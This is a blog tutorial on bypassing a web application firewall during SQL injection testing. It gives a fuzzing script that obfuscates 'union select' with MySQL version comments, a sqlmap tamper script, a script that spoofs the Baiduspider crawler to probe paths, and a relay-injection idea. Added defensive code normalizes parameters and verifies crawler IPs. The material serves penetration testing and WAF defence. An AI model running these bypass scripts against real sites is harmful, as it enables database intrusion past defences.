SQL Injection: WAF Bypass (Part 2)


0. Preface

Where a WAF is in place, you need to build up a systematic body of bypass techniques and knowledge before you can pentest such targets well; that includes picking up some scripting skills of our own to support the attack.

1. Fuzz bypass script

(Source: 小迪安全)

```python
import requests, time

url = 'http://127.0.0.1:8080/sqli/Less-2/?id=-1'
union = 'union'
select = 'select'
num = '1,2,3'
a = {'%0a', '%23'}      # separators inserted around each keyword: newline or '#'
aa = {'x'}              # filler character between the separators
aaa = {'%0a', '%23'}
b = '/*!'               # opener of a MySQL version comment; a version number follows
c = '*/'


def bypass():
    for xiaodi in a:
        for xiaodis in aa:
            for xiaodiss in aaa:
                # try version numbers 44500-44599 inside /*!NNNNN ... */
                for two in range(44500, 44600):
                    urls = url + xiaodi + xiaodis + xiaodiss + b + str(two) + union + c + xiaodi + xiaodis + xiaodiss + select + xiaodi + xiaodis + xiaodiss + num
                    # urlss = url+xiaodi+xiaodis+xiaodiss+union+xiaodi+xiaodis+xiaodiss+b+str(two)+select+c+xiaodi+xiaodis+xiaodiss+num
                    try:
                        result = requests.get(urls).text
                        len_r = len(result)
                        # 'safedog' in the body means the WAF block page was returned
                        if result.find('safedog') == -1:
                            print('bypass url address:' + urls + '|' + str(len_r))
                            # 715 bytes is the length of the normal (unblocked) page in this lab
                            if len_r == 715:
                                fp = open('url.txt', 'a+')
                                fp.write(urls + '\n')
                                fp.close()
                    except Exception as err:
                        print('connecting error')
                    time.sleep(0.1)


if __name__ == '__main__':
    print('fuzz start!')
    bypass()
```

2. Payload script (sqlmap tamper)

```python
"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import os

from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST


def dependencies():
    singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))


def tamper(payload, **kwargs):
    # turns e.g. "union select 1,2,3" into %23a%0aunion/*!44575select*/1,2,3
    if payload:
        payload = payload.replace("union", "%23a%0aunion")
        payload = payload.replace("select", "/*!44575select*/")
        payload = payload.replace("%20", "%23a%0a")
        payload = payload.replace(" ", "%23a%0a")   # literal space; replace("", ...) would mangle every character
        payload = payload.replace("database()", "database%23a%0a()")
    return payload
```
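Both scripts above rely on the same gap: the WAF pattern-matches the raw query string, while MySQL first discards `#...` line comments and executes the body of `/*!NNNNN ... */` version comments. The following is an added, defender-side example (not part of the original post or of sqlmap) showing how a WAF or log-review tool can canonicalize a parameter the way MySQL will actually read it before applying the keyword rule; the rule `NAIVE_RULE`, the helper names and the sample inputs are my own constructions, and the two sample payloads are the shapes produced by the fuzz script of section 1 and the tamper script of section 2.

```python
import re
from urllib.parse import unquote

# The kind of rule a WAF might ship: "union", whitespace, "select".
NAIVE_RULE = re.compile(r"\bunion\s+select\b", re.IGNORECASE)

# /*!NNNNN body */ : MySQL runs "body" when its version >= NNNNN, so keep the body.
VERSION_COMMENT = re.compile(r"/\*!\d{0,6}\s*(.*?)\*/", re.DOTALL)
# Ordinary block comments are dropped entirely.
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
# '#' and '-- ' comments run to end of line; the newline still separates tokens.
LINE_COMMENT = re.compile(r"(?:#|--\s)[^\n]*\n")


def normalize(raw):
    """Canonicalize a query-string value into the token stream MySQL parses."""
    s = unquote(unquote(raw))          # decode twice so %2523 -> %23 -> '#'
    s = LINE_COMMENT.sub(" ", s)       # '#a\n' becomes a single separator
    s = VERSION_COMMENT.sub(r" \1 ", s)  # '/*!44575select*/' becomes ' select '
    s = BLOCK_COMMENT.sub(" ", s)
    return re.sub(r"\s+", " ", s).strip()


def matches_raw(raw):
    """What a naive WAF sees: the rule applied to the undecoded string."""
    return NAIVE_RULE.search(raw) is not None


def is_union_injection(raw):
    """The same rule applied after normalization."""
    return NAIVE_RULE.search(normalize(raw)) is not None


# Constructed sample values of the "id" parameter, as a WAF would receive them.
SAMPLE_PARAMS = [
    "42",                                                   # benign
    "1/*note*/",                                            # benign, with a comment
    "-1%23a%0aunion/*!44575select*/1,2,3",                  # section 2 tamper output
    "-1%23x%0a/*!44500union*/%23x%0aselect%23x%0a1,2,3",    # section 1 fuzz shape
]


def flagged(params):
    """Return the values the normalized rule flags, for review or blocking."""
    return [p for p in params if is_union_injection(p)]


if __name__ == "__main__":
    for p in SAMPLE_PARAMS:
        print(f"{p!r:60} raw={matches_raw(p)!s:5} normalized={is_union_injection(p)}")
```

The point to take from the output is that `matches_raw` misses both bypass payloads while `is_union_injection` catches them with the very same rule; the fix is in the decoding stage, not in adding more signatures. Normalization of this kind should be applied to every decoded parameter, and the normalized form, not the raw one, should be what gets logged for later triage.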

3. Script disguised as the Baidu crawler

(HTTP fingerprint headers of search-engine crawlers)

```python
import requests

url = 'http://192.168.0.103:8080/'

# Present the User-Agent of Baidu's crawler; some WAFs exempt search-engine bots
head = {
    'User-Agent': 'Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)'
}
for data in open('PH1P.txt'):      # one path per line
    data = data.replace('\n', '')
    urls = url + data
    code = requests.get(urls, headers=head).status_code
    print(urls + '|' + str(code))
```
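A User-Agent string is free to set, so a WAF or access-log review that exempts "Baiduspider" on the header alone is exactly what the script above exploits. The added example below (my own code, not from the original post) shows the standard check for a claimed search-engine crawler: reverse-resolve the client IP, require the hostname to be under the engine's domain, then forward-resolve that hostname and confirm it contains the original IP. The domain suffixes `.baidu.com` and `.baidu.jp` follow Baidu's published guidance as I recall it and should be treated as an assumption; the IPs, hostnames and log records are constructed placeholders so the example runs offline, while `real_ptr_lookup` / `real_a_lookup` use the live resolver.

```python
import socket

# Constructed DNS answers (RFC 5737 documentation addresses) used when running offline.
FAKE_PTR = {
    "203.0.113.10": "baiduspider-203-0-113-10.crawl.baidu.com",
    "203.0.113.11": "spoofed.baidu.com",      # PTR looks right; forward lookup will not confirm it
    "198.51.100.7": "scanner.example.net",
}
FAKE_A = {
    "baiduspider-203-0-113-10.crawl.baidu.com": ["203.0.113.10"],
    "spoofed.baidu.com": ["192.0.2.99"],
    "scanner.example.net": ["198.51.100.7"],
}

CRAWLER_SUFFIXES = (".baidu.com", ".baidu.jp")   # assumption: Baidu's documented PTR domains


def fake_ptr_lookup(ip):
    if ip not in FAKE_PTR:
        raise OSError("no PTR record")
    return FAKE_PTR[ip]


def fake_a_lookup(host):
    if host not in FAKE_A:
        raise OSError("no A record")
    return FAKE_A[host]


def real_ptr_lookup(ip):
    return socket.gethostbyaddr(ip)[0]          # raises socket.herror (an OSError) on failure


def real_a_lookup(host):
    return socket.gethostbyname_ex(host)[2]     # list of addresses


def is_genuine_baiduspider(ip, user_agent, ptr_lookup=real_ptr_lookup, a_lookup=real_a_lookup):
    """True only if the client claims Baiduspider AND reverse/forward DNS agree."""
    if "baiduspider" not in user_agent.lower():
        return False
    try:
        host = ptr_lookup(ip)
    except OSError:
        return False                            # no PTR at all: cannot be the real crawler
    if not host.lower().rstrip(".").endswith(CRAWLER_SUFFIXES):
        return False
    try:
        return ip in a_lookup(host)             # forward-confirm to defeat a spoofed PTR
    except OSError:
        return False


# Constructed access-log records: (client IP, User-Agent)
SAMPLE_LOG = [
    ("203.0.113.10", "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"),
    ("203.0.113.11", "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"),
    ("198.51.100.7", "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"),
    ("192.0.2.5", "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"),
    ("198.51.100.8", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/115.0"),
]


def spoofed_crawlers(log, ptr_lookup=real_ptr_lookup, a_lookup=real_a_lookup):
    """IPs that claim to be Baiduspider but fail verification; these get no bot exemption."""
    return [ip for ip, ua in log
            if "baiduspider" in ua.lower()
            and not is_genuine_baiduspider(ip, ua, ptr_lookup, a_lookup)]


if __name__ == "__main__":
    for ip in spoofed_crawlers(SAMPLE_LOG, fake_ptr_lookup, fake_a_lookup):
        print("claims Baiduspider but is not verified:", ip)
```

Cache the verification result per IP rather than resolving on every request, and apply normal WAF rules (not the crawler exemption) to anything that fails it; only the first log entry passes both lookups here.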

4. Relay injection

sqlmap injects into the locally hosted script's URL -> locally hosted script (custom-written code that builds the request) -> remote address

When the injection point in the target site's URL is encoded, sqlmap cannot be used against it directly, so you host a site locally and write a PHP script that performs the encoding; sqlmap can then be run against that script for testing.

References

Related links:

SQL Injection: WAF Bypass (Part 2)
https://one-null-pointer.github.io/2022/08/29/SQL注入——WAF绕过(二)/
Author: liaoyue
Posted on August 29, 2022